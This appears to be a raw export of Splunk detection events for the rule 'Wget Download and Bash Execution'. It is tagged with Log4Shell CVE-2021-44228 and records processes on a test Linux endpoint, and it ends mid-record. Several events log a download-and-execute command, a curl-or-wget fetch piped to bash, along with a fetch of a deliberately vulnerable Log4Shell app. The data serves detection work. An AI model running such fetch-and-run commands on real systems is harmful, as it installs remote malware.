annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638231", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:23:51", parent_process_id="8018", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="8020", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642642716, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638231", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:23:51", parent_process_id="8018", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="8020", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642642716, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633944", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:24", parent_process_id="7877", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7879", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642642716, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633944", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:24", parent_process_id="7877", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7879", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642642716, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633942", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:22", parent_process_id="7870", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7872", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642642716, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633942", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:22", parent_process_id="7870", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7872", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642642716, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631831", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:37:11", parent_process_id="7798", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7799", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642642716, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631831", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:37:11", parent_process_id="7798", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7799", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642642716, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642630698", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:18:18", parent_process_id="5678", parent_process_name="bash", process="wget https://github.com/d1vious/log4shell_bits/raw/main/log4shell-vulnerable-app-0.0.1-SNAPSHOT.jar", process_id="7708", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642642716, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642630698", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:18:18", parent_process_id="5678", parent_process_name="bash", process="wget https://github.com/d1vious/log4shell_bits/raw/main/log4shell-vulnerable-app-0.0.1-SNAPSHOT.jar", process_id="7708", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642642716, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638101", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:21:41", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="8018", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642642716, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638101", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:21:41", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="8018", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642642716, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633814", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:14", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7877", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642642716, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633814", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:14", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7877", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642642716, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633812", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:12", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7870", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642642716, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633812", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:12", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7870", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642642716, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631700", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:35:00", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7798", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", 